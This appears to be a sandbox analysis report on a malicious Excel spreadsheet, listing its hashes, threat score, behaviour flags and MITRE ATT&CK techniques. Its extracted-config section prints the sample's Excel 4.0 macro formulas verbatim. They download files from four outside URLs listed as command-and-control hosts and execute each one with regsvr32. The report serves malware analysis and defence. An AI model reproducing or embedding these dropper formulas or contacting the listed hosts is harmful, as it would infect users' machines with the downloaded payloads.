Overview

overview

10

Static

static

10

5ffa4cb3f7...46.xls

windows7-x64

10

5ffa4cb3f7...46.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xlsx

  • Size

    92KB

  • Sample

    230211-cs3qnadc8y

  • MD5

    c8d86480cae889d55896e2642369a5f1

  • SHA1

    5912e9a715533d5b9110daab4dbafe49236c8891

  • SHA256

    5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946

  • SHA512

    8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714

  • SSDEEP

    1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/

http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/

https://wijsneusmedia.nl/cgi-bin/kFB/

http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/","..\elv1.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/","..\elv2.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wijsneusmedia.nl/cgi-bin/kFB/","..\elv3.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/","..\elv4.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.muyehuayi.com/cmp/8asA99KPsyA/v6lUsWbLen/
xlm40.dropper

http://concivilpa.com.py/wp-admin/i3CQu9dzDrMW/
xlm40.dropper

https://wijsneusmedia.nl/cgi-bin/kFB/
xlm40.dropper

http://www.angloextrema.com.br/assets/oEt1yYckHKlnNIq/

Targets

    • Target

      5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946.xlsx

    • Size

      92KB

    • MD5

      c8d86480cae889d55896e2642369a5f1

    • SHA1

      5912e9a715533d5b9110daab4dbafe49236c8891

    • SHA256

      5ffa4cb3f7db82c5db94ff5a288f132602383e285c9f110ba3b2eae848b2e946

    • SHA512

      8b7182cdd30b1a95412bd847c30ff32e2493c5c445a0fcea12ce5801db7b3657a5230b328db66b44994c195862ffd7187acd972d771f8182e54b750563ef7714

    • SSDEEP

      1536:/Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdApbCXuZH4gb4CEn9J4ZKnQxW:tk3hOdsylKlgxopeiBNhZFGzE+cL2kdH

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks